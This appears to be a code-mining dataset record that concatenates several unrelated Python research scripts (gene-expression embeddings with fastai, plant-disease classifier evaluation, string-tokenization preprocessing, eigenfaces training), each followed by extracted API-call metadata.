'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (3567, 3607), True, 'import matplotlib.pyplot as plt\n'), ((3621, 3632), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3630, 3632), True, 'import matplotlib.pyplot as plt\n'), ((4671, 4704), 'matplotlib.pyplot.xticks', 'plt.xticks', ([], {'rotation': '"""horizontal"""'}), "(rotation='horizontal')\n", (4681, 4704), True, 'import matplotlib.pyplot as plt\n'), ((4718, 4732), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['""""""'], {}), "('')\n", (4728, 4732), True, 'import matplotlib.pyplot as plt\n'), ((4746, 4764), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0, 0.1)'], {}), '((0, 0.1))\n', (4754, 4764), True, 'import matplotlib.pyplot as plt\n'), ((4777, 4836), 
'matplotlib.pyplot.axhline', 'plt.axhline', ([], {'y': '(0.05)', 'linewidth': '(1)', 'color': '"""r"""', 'linestyle': '"""--"""'}), "(y=0.05, linewidth=1, color='r', linestyle='--')\n", (4788, 4836), True, 'import matplotlib.pyplot as plt\n'), ((4894, 4939), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of Subjects"""'], {'fontsize': '(18)'}), "('Number of Subjects', fontsize=18)\n", (4904, 4939), True, 'import matplotlib.pyplot as plt\n'), ((5002, 5091), 'os.path.join', 'join', (['results_dir', "('MUSim_Null_FamilywiseTypeI_%s_%dtrials.tif' % (time_wind, trials))"], {}), "(results_dir, 'MUSim_Null_FamilywiseTypeI_%s_%dtrials.tif' % (time_wind,\n trials))\n", (5006, 5091), False, 'from os.path import join\n'), ((5101, 5152), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (5112, 5152), True, 'import matplotlib.pyplot as plt\n'), ((5166, 5177), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (5175, 5177), True, 'import matplotlib.pyplot as plt\n'), ((5271, 5294), 'os.listdir', 'os.listdir', (['results_dir'], {}), '(results_dir)\n', (5281, 5294), False, 'import os\n'), ((5437, 5463), 'os.path.join', 'join', (['results_dir', 'ew_file'], {}), '(results_dir, ew_file)\n', (5441, 5463), False, 'from os.path import join\n'), ((6035, 6051), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0, 1)'], {}), '((0, 1))\n', (6043, 6051), True, 'import matplotlib.pyplot as plt\n'), ((2654, 2685), 'os.path.join', 'join', (['results_dir', '"""legend.tif"""'], {}), "(results_dir, 'legend.tif')\n", (2658, 2685), False, 'from os.path import join\n'), ((2703, 2754), 'matplotlib.pyplot.savefig', 'plt.savefig', (['img_file'], {'bbox_inches': '"""tight"""', 'dpi': '(600)'}), "(img_file, bbox_inches='tight', dpi=600)\n", (2714, 2754), True, 'import matplotlib.pyplot as plt\n'), ((2772, 2783), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2781, 2783), True, 'import matplotlib.pyplot as plt\n'), ((2528, 2559), 'os.path.join', 'join', (['results_dir', '"""legend.tif"""'], {}), "(results_dir, 'legend.tif')\n", (2532, 2559), False, 'from os.path import join\n'), ((4860, 4876), 'numpy.arange', 'np.arange', (['(1)', '(11)'], {}), '(1, 11)\n', (4869, 4876), True, 'import numpy as np\n')]
|
from __future__ import print_function
from argparse import ArgumentParser
from fastai.learner import *
from fastai.column_data import *
import numpy as np
import pandas as pd
import seaborn as sns
def build_parser():
parser = ArgumentParser()
parser.add_argument('--data', type=str, nargs=None, dest='in_path', help='input file path', required=True)
parser.add_argument('--out-prefix', type=str, nargs=None, dest='model', help='output prefix', required=True)
parser.add_argument('--out-dir', type=str, nargs=None, dest='out_dir', help='output directory', required=True)
parser.add_argument('--num-dim', type=int, nargs=None, dest='num_dim', help='number of dimension of resulting embedding', required=False, default=50)
parser.add_argument('--bs', type=int, nargs=None, dest='bs', help='batch size', required=False, default=64)
parser.add_argument('--num-epoch', type=int, nargs=None, dest='num_eps', help='number of epoch(s)', required=False, default=3)
parser.add_argument('--learning-rate', type=float, nargs=None, dest='lr', help='learning rate', required=False, default=1e-5)
return parser
def main():
parser = build_parser()
opts = parser.parse_args()
if torch.cuda.is_available() and torch.backends.cudnn.enabled:
torch.cuda.set_device(0)
else:
print('CUDA or CUDNN not available.')
return
in_path = opts.in_path
n_factors = opts.num_dim
bs = opts.bs
num_eps = opts.num_eps
lr = opts.lr
out_dir = opts.out_dir
prefix = opts.model
outpath = out_dir+'/'+prefix+'_'
### data preparation
df = pd.read_csv(in_path, sep=',', low_memory=False, index_col=[0], error_bad_lines=False)
sids = list(df.index)
df = df.assign(id=sids)
df = df.reset_index(drop=True)
mdf = pd.melt(df, id_vars=['id'], var_name='gene', value_name='log2exp')
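    # The melt turns the (sample x gene) expression matrix into long format with one
    # (id, gene, log2exp) row per pair, so the collaborative-filtering learner below can
    # treat samples as "users", genes as "items" and log2 expression as the "rating".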
### training
val_idxs = get_cv_idxs(len(mdf))
    cd = CollabFilterDataset.from_data_frame(out_dir, mdf, 'id', 'gene', 'log2exp')
learn = cd.get_learner(n_factors, val_idxs, bs, opt_fn=optim.Adam)
learn.fit(lr, num_eps)
learn.save(outpath+'model')
### plot jointplot
preds = learn.predict()
y=learn.data.val_y
jp = sns.jointplot(preds, y, kind='hex', stat_func=None)
jp.set_axis_labels('ground truth log2(exp)', 'predicted log2(exp)')
jp.savefig(outpath+'trn_metric_jointplot.png')
### output embedding
genes = list(df.columns[:-2])
sids = list(df['id'])
geneidx = np.array([cd.item2idx[g] for g in genes])
m=learn.model
m.cuda()
### output gene embedding matrix and bias
gene_emb = to_np(m.i(V(geneidx)))
gene_emb_df = pd.DataFrame(gene_emb, index=genes)
gene_emb_df.to_csv(outpath+'gemb.csv', sep=',')
gene_emb_bias = to_np(m.ib(V(geneidx)))
gene_emb_bias_df = pd.DataFrame(gene_emb_bias, index=genes)
gene_emb_bias_df.to_csv(outpath+'gemb_bias.csv')
### output sample embedding matrix and bias
sampleidx = np.array([cd.user2idx[sid] for sid in sids])
samp_emb = to_np(m.u(V(sampleidx)))
samp_emb_df = pd.DataFrame(samp_emb, index=sids)
samp_emb_df.to_csv(outpath+'semb.csv', sep=',')
samp_emb_bias = to_np(m.ub(V(sampleidx)))
samp_emb_bias_df = pd.DataFrame(samp_emb_bias, index=sids)
samp_emb_bias_df.to_csv(outpath+'semb_bias.csv')
if __name__ == '__main__':
main()
|
[
"argparse.ArgumentParser",
"pandas.read_csv",
"numpy.array",
"pandas.DataFrame",
"pandas.melt"
] |
[((211, 227), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (225, 227), False, 'from argparse import ArgumentParser\n'), ((1605, 1694), 'pandas.read_csv', 'pd.read_csv', (['in_path'], {'sep': '""","""', 'low_memory': '(False)', 'index_col': '[0]', 'error_bad_lines': '(False)'}), "(in_path, sep=',', low_memory=False, index_col=[0],\n error_bad_lines=False)\n", (1616, 1694), True, 'import pandas as pd\n'), ((1790, 1856), 'pandas.melt', 'pd.melt', (['df'], {'id_vars': "['id']", 'var_name': '"""gene"""', 'value_name': '"""log2exp"""'}), "(df, id_vars=['id'], var_name='gene', value_name='log2exp')\n", (1797, 1856), True, 'import pandas as pd\n'), ((2482, 2523), 'numpy.array', 'np.array', (['[cd.item2idx[g] for g in genes]'], {}), '([cd.item2idx[g] for g in genes])\n', (2490, 2523), True, 'import numpy as np\n'), ((2659, 2694), 'pandas.DataFrame', 'pd.DataFrame', (['gene_emb'], {'index': 'genes'}), '(gene_emb, index=genes)\n', (2671, 2694), True, 'import pandas as pd\n'), ((2814, 2854), 'pandas.DataFrame', 'pd.DataFrame', (['gene_emb_bias'], {'index': 'genes'}), '(gene_emb_bias, index=genes)\n', (2826, 2854), True, 'import pandas as pd\n'), ((2973, 3017), 'numpy.array', 'np.array', (['[cd.user2idx[sid] for sid in sids]'], {}), '([cd.user2idx[sid] for sid in sids])\n', (2981, 3017), True, 'import numpy as np\n'), ((3076, 3110), 'pandas.DataFrame', 'pd.DataFrame', (['samp_emb'], {'index': 'sids'}), '(samp_emb, index=sids)\n', (3088, 3110), True, 'import pandas as pd\n'), ((3232, 3271), 'pandas.DataFrame', 'pd.DataFrame', (['samp_emb_bias'], {'index': 'sids'}), '(samp_emb_bias, index=sids)\n', (3244, 3271), True, 'import pandas as pd\n')]
|
# %%
import matplotlib.pyplot as plt
import numpy as np
import sklearn
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
from model.inceptionv4 import inceptionv4
from model.mobilenetv2 import mobilenetv2
from model.resnet import resnet18
from model.shufflenetv2 import shufflenetv2
from model.vgg import vgg9_bn
from s3_dataset import PlantDataSet, PlantDataSetB
# %%
def get_acc(net, device, data_loader):
'''
get acc
'''
correct = 0
total = 0
with torch.no_grad():
net.eval()
for data in data_loader:
images, labels = data
images = images.float().to(device)
labels = labels.long().to(device)
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
return correct / total
def get_pre(net, device, data_loader):
'''
    Get the predictions for the whole test set, along with the labels
'''
label_all = []
pre_all = []
with torch.no_grad():
net.eval()
for data in data_loader:
images, labels = data
images = images.float().to(device)
labels = labels.long().to(device)
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
label_all.extend(labels.data.cpu().numpy())
pre_all.extend(predicted.data.cpu().numpy())
return pre_all, label_all
# %%
Func = [vgg9_bn, resnet18, shufflenetv2, mobilenetv2, inceptionv4]
Save_path = [
'../model_save/plant_disease2/vgg.pth',
'../model_save/plant_disease2/resnet18.pth',
'../model_save/plant_disease2/shufflenetv2.pth',
'../model_save/plant_disease2/mobilenetv2.pth',
'../model_save/plant_disease2/inceptionv4.pth'
]
device = torch.device('cuda:1' if torch.cuda.is_available() else 'cpu')
# data_loader_val = DataLoader(PlantDataSetB(flag='val'),
# batch_size=64,
# shuffle=False)
# data_loader_test = DataLoader(PlantDataSetB(flag='test'),
# batch_size=64,
# shuffle=False)
data_loader_val = DataLoader(PlantDataSet(flag='val'),
batch_size=64,
shuffle=False)
data_loader_test = DataLoader(PlantDataSet(flag='test'),
batch_size=64,
shuffle=False)
print('Domain A dataset: check')
for Index in range(1):
    # load the model and weights
net = Func[Index]()
path_saved_model = Save_path[Index]
net.load_state_dict(torch.load(path_saved_model))
net.to(device)
val_acc = get_acc(net, device, data_loader_val)
test_acc = get_acc(net, device, data_loader_test)
print('{:d}: val_acc:{:.5f}, test_acc:{:.5f}'.format(
Index, val_acc, test_acc))
# %%
# Compute each model's confusion matrix on the two test sets
device = torch.device('cuda:1' if torch.cuda.is_available() else 'cpu')
Func = [vgg9_bn, resnet18, shufflenetv2, mobilenetv2, inceptionv4]
Save_path = [
'../model_save/plant_disease2/vgg.pth',
'../model_save/plant_disease2/resnet18.pth',
'../model_save/plant_disease2/shufflenetv2.pth',
'../model_save/plant_disease2/mobilenetv2.pth',
'../model_save/plant_disease2/inceptionv4.pth'
]
data_test_a = DataLoader(PlantDataSet(flag='test'),
batch_size=64,
shuffle=False)
data_test_b = DataLoader(PlantDataSetB(flag='test'),
batch_size=64,
shuffle=False)
Index = 1
# load the model and weights
net = Func[Index]()
path_saved_model = Save_path[Index]
net.load_state_dict(torch.load(path_saved_model))
net.to(device)
pre, label = get_pre(net, device, data_test_b)
pre, label = np.array(pre), np.array(label)
# %%
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score  # accuracy
from sklearn.metrics import confusion_matrix  # confusion matrix
print('Prediction accuracy: {:.9f}'.format(accuracy_score(label, pre)))
# Inspect the confusion matrix
domain_A_class = {
'Apple___Apple_scab': 0,
'Apple___Black_rot': 1,
'Apple___Cedar_apple_rust': 2,
'Apple___healthy': 3,
'Blueberry___healthy': 4,
'Cherry_(including_sour)___Powdery_mildew': 5,
'Cherry_(including_sour)___healthy': 6,
'Corn_(maize)___Cercospora_leaf_spot Gray_leaf_spot': 7,
'Corn_(maize)___Common_rust_': 8,
'Corn_(maize)___Northern_Leaf_Blight': 9,
'Corn_(maize)___healthy': 10,
'Grape___Black_rot': 11,
'Grape___Esca_(Black_Measles)': 12,
'Grape___Leaf_blight_(Isariopsis_Leaf_Spot)':13,
'Grape___healthy':14,
'Orange___Haunglongbing_(Citrus_greening)':15,
'Peach___Bacterial_spot':16,
'Peach___healthy':17,
'Pepper,_bell___Bacterial_spot':18,
'Pepper,_bell___healthy':19,
'Potato___Early_blight':20,
'Potato___Late_blight':21,
'Potato___healthy':22,
'Raspberry___healthy':23,
'Soybean___healthy':24,
'Squash___Powdery_mildew':25,
'Strawberry___Leaf_scorch':26,
'Strawberry___healthy':27,
'Tomato___Bacterial_spot':28,
'Tomato___Early_blight':29,
'Tomato___Late_blight':30,
'Tomato___Leaf_Mold':31,
'Tomato___Septoria_leaf_spot':32,
'Tomato___Spider_mites Two-spotted_spider_mite':33,
'Tomato___Target_Spot':34,
'Tomato___Tomato_Yellow_Leaf_Curl_Virus':35,
'Tomato___Tomato_mosaic_virus':36,
'Tomato___healthy':37}
c_matrix = confusion_matrix(label, pre, labels=list(range(38)))
# %% Keep this code
def plot_Matrix(cm, classes, title=None, cmap=plt.cm.Blues):
    plt.rc('font',family='Times New Roman',size='8') # set font family and size
    # normalize each row
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
str_cm = cm.astype(np.str).tolist()
for row in str_cm:
print('\t'.join(row))
    # cells below 1% are set to 0 so they do not show up in the final coloring
for i in range(cm.shape[0]):
for j in range(cm.shape[1]):
if int(cm[i, j]*100 + 0.5) == 0:
cm[i, j]=0
fig, ax = plt.subplots()
im = ax.imshow(cm, interpolation='nearest', cmap=cmap)
    # ax.figure.colorbar(im, ax=ax) # side colorbar
ax.set(xticks=np.arange(cm.shape[1]),
yticks=np.arange(cm.shape[0]),
xticklabels=classes, yticklabels=classes,
title=title,
ylabel='Actual',
xlabel='Predicted')
    # draw a minor grid to imitate a border around each cell
ax.set_xticks(np.arange(cm.shape[1]+1)-.5, minor=True)
ax.set_yticks(np.arange(cm.shape[0]+1)-.5, minor=True)
ax.grid(which="minor", color="gray", linestyle='-', linewidth=0.2)
ax.tick_params(which="minor", bottom=False, left=False)
    # rotate the x-axis labels by 45 degrees
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
    # annotate each cell with its percentage
fmt = 'd'
thresh = cm.max() / 2.
for i in range(cm.shape[0]):
for j in range(cm.shape[1]):
if int(cm[i, j]*100 + 0.5) > 0:
ax.text(j, i, format(int(cm[i, j]*100 + 0.5) , fmt) + '%',
ha="center", va="center",
color="white" if cm[i, j] > thresh else "black")
plt.show()
# %%
domain_A_class.keys()
# %%
plt.matshow(c_matrix, cmap=plt.cm.Blues)
# %%
|
[
"sklearn.metrics.accuracy_score",
"s3_dataset.PlantDataSetB",
"numpy.arange",
"torch.load",
"torch.max",
"numpy.array",
"torch.cuda.is_available",
"s3_dataset.PlantDataSet",
"torch.no_grad",
"matplotlib.pyplot.matshow",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.rc",
"matplotlib.pyplot.show"
] |
[((7200, 7234), 'matplotlib.pyplot.matshow', 'plt.matshow', (['cm'], {'cmap': 'plt.cm.Blues'}), '(cm, cmap=plt.cm.Blues)\n', (7211, 7234), True, 'import matplotlib.pyplot as plt\n'), ((2225, 2249), 's3_dataset.PlantDataSet', 'PlantDataSet', ([], {'flag': '"""val"""'}), "(flag='val')\n", (2237, 2249), False, 'from s3_dataset import PlantDataSet, PlantDataSetB\n'), ((2369, 2394), 's3_dataset.PlantDataSet', 'PlantDataSet', ([], {'flag': '"""test"""'}), "(flag='test')\n", (2381, 2394), False, 'from s3_dataset import PlantDataSet, PlantDataSetB\n'), ((3337, 3362), 's3_dataset.PlantDataSet', 'PlantDataSet', ([], {'flag': '"""test"""'}), "(flag='test')\n", (3349, 3362), False, 'from s3_dataset import PlantDataSet, PlantDataSetB\n'), ((3477, 3503), 's3_dataset.PlantDataSetB', 'PlantDataSetB', ([], {'flag': '"""test"""'}), "(flag='test')\n", (3490, 3503), False, 'from s3_dataset import PlantDataSet, PlantDataSetB\n'), ((3691, 3719), 'torch.load', 'torch.load', (['path_saved_model'], {}), '(path_saved_model)\n', (3701, 3719), False, 'import torch\n'), ((3796, 3809), 'numpy.array', 'np.array', (['pre'], {}), '(pre)\n', (3804, 3809), True, 'import numpy as np\n'), ((3811, 3826), 'numpy.array', 'np.array', (['label'], {}), '(label)\n', (3819, 3826), True, 'import numpy as np\n'), ((5563, 5613), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'family': '"""Times New Roman"""', 'size': '"""8"""'}), "('font', family='Times New Roman', size='8')\n", (5569, 5613), True, 'import matplotlib.pyplot as plt\n'), ((6031, 6045), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (6043, 6045), True, 'import matplotlib.pyplot as plt\n'), ((7154, 7164), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7162, 7164), True, 'import matplotlib.pyplot as plt\n'), ((530, 545), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (543, 545), False, 'import torch\n'), ((1058, 1073), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1071, 1073), False, 'import torch\n'), ((1859, 1884), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1882, 1884), False, 'import torch\n'), ((2632, 2660), 'torch.load', 'torch.load', (['path_saved_model'], {}), '(path_saved_model)\n', (2642, 2660), False, 'import torch\n'), ((2942, 2967), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (2965, 2967), False, 'import torch\n'), ((4006, 4032), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['label', 'pre'], {}), '(label, pre)\n', (4020, 4032), False, 'from sklearn.metrics import accuracy_score\n'), ((787, 813), 'torch.max', 'torch.max', (['outputs.data', '(1)'], {}), '(outputs.data, 1)\n', (796, 813), False, 'import torch\n'), ((1315, 1341), 'torch.max', 'torch.max', (['outputs.data', '(1)'], {}), '(outputs.data, 1)\n', (1324, 1341), False, 'import torch\n'), ((6174, 6196), 'numpy.arange', 'np.arange', (['cm.shape[1]'], {}), '(cm.shape[1])\n', (6183, 6196), True, 'import numpy as np\n'), ((6216, 6238), 'numpy.arange', 'np.arange', (['cm.shape[0]'], {}), '(cm.shape[0])\n', (6225, 6238), True, 'import numpy as np\n'), ((6419, 6445), 'numpy.arange', 'np.arange', (['(cm.shape[1] + 1)'], {}), '(cm.shape[1] + 1)\n', (6428, 6445), True, 'import numpy as np\n'), ((6478, 6504), 'numpy.arange', 'np.arange', (['(cm.shape[0] + 1)'], {}), '(cm.shape[0] + 1)\n', (6487, 6504), True, 'import numpy as np\n')]
|
import numpy as np
import json
import re
from Utils import *
np.random.seed(4)
def output_process(example):
state = e['state'][-1]
if type(state) == str:
return state
else:
return ' '.join(state)
def polish_notation(steps):
step_mapping = {}
for ix, s in enumerate(steps):
references = re.findall('@@\d+@@', s)
if len(references):
indices = [int(x.replace('@@','')) - 1 for x in references]
if len(references) == 1:
s = '(' + s.replace(' ' + references[0], '') + ', ' + step_mapping[indices[0]] + ')'
step_mapping[ix] = s
else:
first_index, final_index = s.index(references[0]) - 1, s.index(references[-1]) + len(references[-1])
s = '(' + s[:first_index] + s[final_index:] + ', '
for jx in indices:
s += step_mapping[jx] + ', '
s = s[:-2] + ')'
step_mapping[ix] = s
else:
step_mapping[ix] = s
return step_mapping[len(steps) - 1][1:-1]
def subgraphs_from_polish(polish_):
if polish_.count('(') == 0 and polish_.count(','):
return [x.strip() for x in polish_.split(',')][1:]
result_holder = []
while True:
try:
first_paren = polish_.index('(')
except ValueError:
break
open_paren = 1
for ix, char in enumerate(polish_[first_paren+1:]):
if char == '(':
open_paren += 1
elif char == ')':
open_paren -= 1
if open_paren == 0:
result_holder.append(polish_[first_paren+1:first_paren + ix + 1])
polish_ = polish_[first_paren + ix:]
# print('new polish:', polish_)
break
while '' in result_holder:
result_holder.remove('')
intermed_results = [subgraphs_from_polish(x) for x in result_holder]
if type(intermed_results[0]) == list:
intermed_results = [item for sublist in intermed_results for item in sublist]
return result_holder + intermed_results
def remove_duplicates(data_list):
data_set = []
sorted_data = sorted(data_list, key=lambda x: ' '.join(x['nlg']))
for ix in range(len(sorted_data) - 1):
e = sorted_data[ix]
if e['nlg'] != sorted_data[ix + 1]['nlg']:
data_set.append(e)
data_set.append(sorted_data[-1])
return data_set
def is_valid_dag(nlg):
steps_n = len(nlg)
references = re.findall('@@\d+@@', ' '.join(nlg))
return len(list(set(references))) + 1 == steps_n
def get_valid_subgraphs(example):
states, instructions, tokenized_states = example['state'], example['nlg'], example['tokenized_state']
subgraphs = []
steps_n = len(states)
for steps_index in range(steps_n):
if is_valid_dag(instructions[:steps_index + 1]):
subgraphs.append((instructions[:steps_index + 1], tokenized_states[steps_index]))
else:
new_instructions = prune_and_reference(instructions[:steps_index + 1])
subgraphs.append((new_instructions, tokenized_states[steps_index]))
return subgraphs
def prune_and_reference(instructions):
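    # Starting from the final instruction, keep only the steps reachable through @@n@@
    # references, drop the rest, and renumber the surviving references so they stay
    # consistent after the removals.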
queue = [instructions[-1]]
required_indices = [len(instructions) - 1]
while len(queue):
step = queue.pop(0)
references = re.findall(r'@@\d+@@', step)
indices = [int(x.replace('@@', '')) - 1 for x in references]
required_indices += indices
queue += [instructions[index] for index in indices]
prior_removals = 0
pruned_instructions = []
for index, instruction in enumerate(instructions):
if index not in required_indices:
prior_removals += 1
else:
if prior_removals > 0:
for ref_index, referencer in enumerate(instructions[index + 1:]):
if '@@' + str(index + 1) + '@@' in referencer:
instructions[index + ref_index + 1] = instructions[index + ref_index + 1].replace(
'@@' + str(index + 1) + '@@', '@@' + str(index + 1 - prior_removals) + '@@'
)
pruned_instructions.append(instruction)
return pruned_instructions
def tokenize_string(example_state, example_vocab):
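    # Greedy longest-match tokenization against the per-example vocabulary: try 3-, 2-,
    # then 1-character pieces (for multi-character pieces, the reversal is also accepted);
    # pieces after the first are prefixed with '%'. Returns None if the state cannot be
    # covered by the known pieces.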
return_step = ''
temp_state = example_state[:].lower()
first_tok = True
while len(temp_state):
if temp_state[:3] in example_vocab or temp_state[:3][::-1] in example_vocab:
if first_tok:
return_step += temp_state[:3] + ' '
first_tok = False
else:
return_step += '%' + temp_state[:3] + ' '
temp_state = temp_state[3:]
elif temp_state[:2] in example_vocab or temp_state[:2][::-1] in example_vocab:
if first_tok:
return_step += temp_state[:2] + ' '
first_tok = False
else:
return_step += '%' + temp_state[:2] + ' '
temp_state = temp_state[2:]
elif temp_state[0] in example_vocab:
if first_tok:
return_step += temp_state[0] + ' '
first_tok = False
else:
return_step += '%' + temp_state[0] + ' '
temp_state = temp_state[1:]
else:
return None
return return_step
with open('list_task_v2.json', 'r', encoding="utf-8") as input_file:
data = json.loads(input_file.read())
data = remove_duplicates(data)
n = len(data)
np.random.shuffle(data)
vocab = []
for e in data:
e_vocab, tokenized_state = [], []
nlg, state = e['nlg'], e['state']
add_bool = True
for ix, step in enumerate(nlg):
tokenized_step = ''
# if terminal node ...
if step.startswith('the string '):
new_string = step.split("'")[1]
tokenized_state.append(state[ix].lower().strip())
e_vocab.append(new_string.lower())
# if state is a string
elif type(state[ix]) == str:
# if it's a reversal
if state[ix][::-1].lower() in e_vocab:
tokenized_state.append(state[ix].lower().strip())
else:
tokenized_step = tokenize_string(state[ix], e_vocab)
if tokenized_step is not None:
tokenized_state.append(tokenized_step.strip())
else:
add_bool = False
break
# if state[ix] is a list
else:
for list_element in state[ix]:
temp_tok = tokenize_string(list_element, e_vocab)
if temp_tok is None:
add_bool = False
break
else:
tokenized_step += ' ' + temp_tok
if add_bool:
            tokenized_step = remove_whitespace(tokenized_step).strip()
tokenized_state.append(tokenized_step)
else:
break
if add_bool:
e['tokenized_state'] = tokenized_state
vocab += e_vocab + ['%' + x for x in e_vocab] + [x[::-1] for x in e_vocab] + ['%' + x[::-1] for x in e_vocab]
vocab = list(set(vocab))
# with open('string_piece_vocabulary.txt', 'w', encoding='utf-8') as f:
# f.write('\n'.join(vocab))
filtered_data = []
for e in data:
if 'tokenized_state' in e.keys():
filtered_data.append(e)
train = filtered_data[:int(n*0.8)]
val = filtered_data[int(n*0.8):int(n*0.9)]
test = filtered_data[int(n*0.9):]
train_in, train_out = '', ''
for jx, e in enumerate(train):
if jx % 5000 == 0:
print(round(float(jx / len(train) * 100), 2), '% complete')
subgraphs = get_valid_subgraphs(e)
for subgraph in subgraphs:
train_input = remove_whitespace(' @@SEP@@ '.join(subgraph[0]).lower().strip())
train_in += train_input + '\n'
if type(subgraph[1]) == list:
train_out += ' '.join(subgraph[1]) + '\n'
else:
train_out += remove_whitespace(subgraph[1].strip()) + '\n'
# train_in += ' @@SEP@@ '.join(e['nlg']).lower() + '\n'
# train_out += e['tokenized_state'][-1].strip() + '\n'
val_in, val_out = '', ''
for e in val:
val_input = ' @@SEP@@ '.join(e['nlg']).lower()
val_in += val_input + '\n'
val_out += e['tokenized_state'][-1].strip() + '\n'
test_in, test_out = '', ''
for e in test:
test_input = ' @@SEP@@ '.join(e['nlg']).lower()
test_in += test_input + '\n'
test_out += e['tokenized_state'][-1].strip() + '\n'
base_path = './dag_baseline_2a/'
with open(base_path + 'train_in.txt', 'w', encoding='utf-8') as f:
f.write(train_in)
with open(base_path + 'train_out.txt', 'w', encoding='utf-8') as f:
f.write(train_out)
with open(base_path + 'val_in.txt', 'w', encoding='utf-8') as f:
f.write(val_in)
with open(base_path + 'val_out.txt', 'w', encoding='utf-8') as f:
f.write(val_out)
with open(base_path + 'test_in.txt', 'w', encoding='utf-8') as f:
f.write(test_in)
with open(base_path + 'test_out.txt', 'w', encoding='utf-8') as f:
f.write(test_out)
|
[
"re.findall",
"numpy.random.seed",
"numpy.random.shuffle"
] |
[((62, 79), 'numpy.random.seed', 'np.random.seed', (['(4)'], {}), '(4)\n', (76, 79), True, 'import numpy as np\n'), ((5577, 5600), 'numpy.random.shuffle', 'np.random.shuffle', (['data'], {}), '(data)\n', (5594, 5600), True, 'import numpy as np\n'), ((335, 360), 're.findall', 're.findall', (['"""@@\\\\d+@@"""', 's'], {}), "('@@\\\\d+@@', s)\n", (345, 360), False, 'import re\n'), ((3386, 3414), 're.findall', 're.findall', (['"""@@\\\\d+@@"""', 'step'], {}), "('@@\\\\d+@@', step)\n", (3396, 3414), False, 'import re\n')]
|
from cv2 import cv2
import numpy as np
import sys
import os
from base import normalize
# some parameters of training and testing data
train_sub_count = 40
train_img_count = 5
total_face = 200
row = 70
col = 70
def eigenfaces_train(src_path):
img_list = np.empty((row*col, total_face))
count = 0
# read all the faces and flatten them
for i in range(1, train_sub_count+1):
for j in range(1, train_img_count+1):
img_path = src_path + "/s" + str(i) + "/" + str(j) + ".png"
img = cv2.imread(img_path, 0)
img_col = np.array(img).flatten()
img_list[:, count] = img_col[:]
count += 1
# compute the average of the faces
img_mean = np.sum(img_list, axis=1) / total_face
diff = np.empty((row*col, total_face))
# compute the difference matrix
for i in range(0, total_face):
diff[:, i] = img_list[:, i] - img_mean[:]
cov = np.mat(diff)*np.mat(diff.T) / total_face
eigen_values, eigen_vectors = np.linalg.eigh(cov)
# sort the eigenvalues and eigenvectors by desc
sort_index = np.argsort(-eigen_values)
eigen_values = eigen_values[sort_index]
eigen_vectors = eigen_vectors[:, sort_index]
# print(eigen_values)
'''
    compute the covariance matrix
    here we don't use the original algorithm, to avoid computing a 10000+ * 10000+ covariance matrix later
    original: cov = 1/m * A*A^T => it would be a 10000+ * 10000+ matrix
    when the dimension of the image (here row*col) > the total number of training images (here total_face)
    (1) cov*v = A*A^T*v = e*v (e is an eigenvalue of cov, v is an eigenvector of cov) => original
    (2) let cov'*u = A^T*A*u = e*u
    thus, multiplying both sides of equation (2) by A on the left, we get the equation below
    (3) A*A^T*(A*u) = e*(A*u)
    comparing (1) with (3): if u is an eigenvector of cov' with eigenvalue e, then A*u = v is an eigenvector of cov
    (for e non-zero; cov and cov' share the same non-zero eigenvalues but have a different number of zero eigenvalues, which can be proven)
    so we can compute A^T*A instead of A*A^T to simplify the computation (which yields a matrix with only 200 * 200 entries)
cov = np.matrix(diff.T)*np.matrix(diff) / total_face
# compute the eigen values and eigen vectors of cov
eigen_values, vectors = np.linalg.eigh(cov)
eigen_vectors = np.matrix(diff)*np.matrix(vectors)
# sort the eigenvalues and eigenvectors by desc
sort_index = np.argsort(-eigen_values)
eigen_values = eigen_values[sort_index]
eigen_vectors = eigen_vectors[:, sort_index]
print(eigen_values)
'''
    # for each training image we compute its weight vector y (y = A^T * x); later the input image's weights are compared against these to find the nearest one
eigenfaces_weight = np.matrix(eigen_vectors.T)*np.matrix(diff)
return img_mean, eigen_values, eigen_vectors, eigenfaces_weight
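# Illustrative sketch (added, not part of the original pipeline): a quick numeric check of
# the A^T*A trick described in the docstring above, using random data and only numpy.
def _small_covariance_trick_demo(n_pixels=300, n_samples=20):
    A = np.random.randn(n_pixels, n_samples)
    small = A.T @ A / n_samples        # n_samples x n_samples, cheap to diagonalize
    e_vals, u = np.linalg.eigh(small)
    v = A @ u                          # candidate eigenvectors of the big covariance
    big = A @ A.T / n_samples          # n_pixels x n_pixels
    # every column v_i should satisfy big @ v_i == e_i * v_i for the non-zero eigenvalues
    return np.allclose(big @ v, v * e_vals)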
|
[
"numpy.mat",
"cv2.cv2.imread",
"numpy.argsort",
"numpy.sum",
"numpy.array",
"numpy.empty",
"numpy.linalg.eigh",
"numpy.matrix"
] |
